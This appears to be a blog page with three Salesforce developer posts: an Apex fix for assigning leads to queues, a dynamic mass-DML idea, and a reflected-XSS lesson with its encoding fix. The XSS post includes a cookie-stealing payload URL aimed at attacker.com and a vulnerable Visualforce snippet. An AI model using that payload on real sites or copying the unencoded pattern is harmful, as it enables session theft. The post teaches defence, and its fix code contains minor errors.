Powered By Blogger

Saturday 26 February 2011

Queue not associated with this SObject type

Recently I experienced with a new exception , while I was creating a test class for one of mine functionality.
I looked for the solution on community and other places but couldn't find helpful.So I continued myself .

here is the case what I was looking for:
Create a lead whose owner should be a queue.

I started with this :
Group grp = new Group(Name='Queue',Type='Queue');
insert grp;
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

but when I was running the class, result was with the exception :
System.DmlException: Insert failed. First exception on row 0; first error: INVALID_OPERATION, Queue not associated with this SObject type: []

Here is the solution to shoot this error:

There  is an object named "QueueSobject".
Represents the mapping between a queue Group and the sObject types associated with the queue, including custom objects.

So whenever you want to have a group as an owner for a record , QueueSObject should be there to mapped that record with Group.

like:

Group grp = new Group(Name='Queue',Type='Queue');
insert grp;

QueueSobject mappingObject = new QueueSobject(QueueId = grp.Id, SobjectType = 'Lead');
System.runAs(new User(Id = UserInfo.getUserId()))
{insert mappingObject;}
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

So try this whenever you are in same kind of trouble.

Queries/comments are invited.















Posted by at 13 comments:

Dynamic Mass DML Functionalities

A very interesting thing is that Salesforce provides the existing classes for performing Mass DML functionalities i.e. Mass Edit, Mass Delete, Mass Update etc. with the concrete SObject . That means you should be able to type cast your Sobaject in to Concrete SObject and then you can perform the Mass DML operations on the result.
We suggest you to instead of doing SObject hard coded you can implement the whole functionality dynamically.
Choose you Object and then choose for filter criteria for searching and then perform the various operation on searched results.Through the salesforce metadata api you can describe the selected SObject and get all the related fields.
your selected criteria then pass to the controller and searched result will be displayed on the UI.
Provide a select all check box and then pass the selected records to the controller and then controller will find out the object name through the key prefix of selcted records ids. and then you can use DML operations to perform any type of action on records.

Queries are invited.
Posted by at No comments:

Saturday 19 February 2011

Salesforce applications with security : Reflected XSS

XSS is also known as cross site scripting.  XSS allows a attackers to inject his code in client script.This is a web application vulnerabilities which allows a attackers to bypass the sharing rules . By doing this he can expose the sensitive data, session cookies etc. also.

Now coming back to the reflected XSS, it impacts the page while page is getting load. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page , in the script block we are fetching an Id Parameter
<apex:page>
<script>
var xssExample = '{!$CurrentPage.Parameters.id}' ;
</script>
</apex:page>

Now have a deep look:
Page is called as :
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page will be loaded it will be executed in following manner:
 var xssExample = '{!$CurrentPage.Parameters.id}' ;
putting the id value from the request parameter :
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attackers.com site.

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.
Posted by at 11 comments:
Subscribe to: Posts (Atom)